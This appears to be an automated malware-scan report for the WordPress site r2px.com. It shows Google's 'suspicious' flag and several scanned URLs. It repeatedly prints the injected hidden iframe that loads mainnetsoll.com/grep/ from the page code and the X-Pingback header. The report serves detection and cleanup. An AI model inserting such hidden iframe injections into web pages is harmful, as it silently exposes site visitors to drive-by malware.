Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=r2px.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://r2px.com/ | 200 OK Content-Length: 9502 Content-Type: text/html | malicious |
Page code contains blacklisted domain: mainnetsoll.com ...[1129 bytes skipped]... t;html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>R2Px.com</title> <meta name="generator" content="WordPress 2.3.1" /> <!-- leave this for stats please --> <style type="text/css" media="screen"> @import url( "><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"></iframe>/wp-content/themes/the-minimalist-right-1.0/style.css ); </style> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://r2px.com/feed" /> <link rel="alternate" type="text/xml" title="RSS .92" href="http://r2px.com/feed/rss" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://r2px.com/feed/atom" /> <link rel="shortcut icon" type="image/x-icon" href="" ...[2935 bytes skipped]... Malicious iFrame found. The same iFrame was found in 8 websites. size: 1x0 style: hidden src: http://mainnetsoll.com/grep/ This URL is marked by Google as suspicious <iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"> | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-includes%2Fjs%2Ftw-sack.js&ver=1.6.1/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-includes/js/tw-sack.js&ver=1.6.1:80 Content-Length: 304 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-includes/js/tw-sack.js&ver=1.6.1:80 LWP::Protocol::http::Socket: getaddrinfo: ÐÐ¼Ñ Ð¸Ð»Ð¸ ÑлÑжба не извеÑÑÐ½Ñ at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-includes%2Fjs%2Ftw-sack.js&ver=1.6.1/test404page.js | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-includes/js/tw-sack.js&ver=1.6.1:80 Content-Length: 304 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-includes/js/tw-sack.js&ver=1.6.1:80 LWP::Protocol::http::Socket: getaddrinfo: ÐÐ¼Ñ Ð¸Ð»Ð¸ ÑлÑжба не извеÑÑÐ½Ñ at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Femail%2Femail-js.php&ver=2.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/email/email-js.php&ver=2.20:80 Content-Length: 315 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/email/email-js.php&ver=2.20:80 LWP::Protocol::http::Socket: getaddrinfo: ÐÐ¼Ñ Ð¸Ð»Ð¸ ÑлÑжба не извеÑÑÐ½Ñ at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Fpostratings%2Fpostratings-js.php&ver=1.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/postratings/postratings-js.php&ver=1.20:80 Content-Length: 327 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/postratings/postratings-js.php&ver=1.20:80 LWP::Protocol::http::Socket: getaddrinfo: ÐÐ¼Ñ Ð¸Ð»Ð¸ ÑлÑжба не извеÑÑÐ½Ñ at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. | ||
http://iframe_style=%22display%3Anone%22+height%3D%220%22+width%3D%221%22+src%3D%22http%3A%2F%2Fmainnetsoll.com%2Fgrep%2F%22%3E%3C%2Fiframe%3E%2Fwp-content%2Fplugins%2Fuseronline%2Fuseronline-js.php&ver=2.20/ | 500 Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/">/wp-content/plugins/useronline/useronline-js.php&ver=2.20:80 Content-Length: 325 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: mainnetsoll.com Can't connect to iframe_style="display:none"+height="0"+width="1"+src="http://mainnetsoll.com/grep/"></iframe>/wp-content/plugins/useronline/useronline-js.php&ver=2.20:80 LWP::Protocol::http::Socket: getaddrinfo: ÐÐ¼Ñ Ð¸Ð»Ð¸ ÑлÑжба не извеÑÑÐ½Ñ at /usr/local/share/perl/5.14.2/LWP/Protocol/http.pm line 49. |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: r2px.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 23:11:22 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: "><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"></iframe>/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: r2px.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 23:11:22 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: "><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"></iframe>/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: r2px.com
Referer: http://www.google.com/search?q=r2px.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: r2px.com
Referer: http://www.google.com/search?q=r2px.com
Result:
The result is similar to the first query. There are no suspicious redirects found.